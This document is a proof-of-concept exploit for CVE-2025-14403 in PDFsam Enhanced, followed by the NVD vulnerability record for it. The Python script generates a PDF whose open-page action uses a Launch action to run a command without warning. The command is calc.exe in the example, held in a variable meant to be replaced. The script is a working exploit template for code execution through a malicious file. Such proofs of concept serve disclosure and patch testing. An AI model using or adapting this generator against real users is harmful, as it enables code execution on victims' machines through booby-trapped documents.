CVE-2025-14403

# CVE-2025-14403 PoC - Malicious PDF with Launch Action # This PoC demonstrates the vulnerability in PDFsam Enhanced # Target: PDFsam Enhanced with vulnerable Launch action implementation import sys def create_malicious_pdf(): """Generate a malicious PDF file with embedded Launch action""" # Malicious command to execute (example: calc.exe on Windows) malicious_command = "calc.exe" # PDF content with Launch action pdf_content = f"""%PDF-1.7 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R /AA << /O 5 0 R >> >> endobj 4 0 obj << /Length 44 >> stream BT /F1 12 Tf 100 700 Td (PDFsam Enhanced Launch Action PoC) Tj ET endstream endobj 5 0 obj << /Type /Action /S /Launch /F << /F ({malicious_command}) /D () >> >> endobj xref 0 6 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n 0000000266 00000 n 0000000380 00000 n trailer << /Size 6 /Root 1 0 R >> startxref 455 %%EOF""" return pdf_content def main(): print("CVE-2025-14403 PoC Generator") print("=" * 50) print("Target: PDFsam Enhanced") print("Vulnerability: Insufficient UI Warning in Launch Action") print("=" * 50) # Generate malicious PDF pdf = create_malicious_pdf() # Save to file output_file = "CVE-2025-14403_poc.pdf" with open(output_file, 'w') as f: f.write(pdf) print(f"\nMalicious PDF created: {output_file}") print("\nWhen opened with vulnerable PDFsam Enhanced:") print("- The malicious command will be executed without warning") print("- No user confirmation dialog is displayed") print("- Code executes in context of current user") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14403", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:46.830", "lastModified": "2026-01-15T17:19:48.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27500."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1091/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}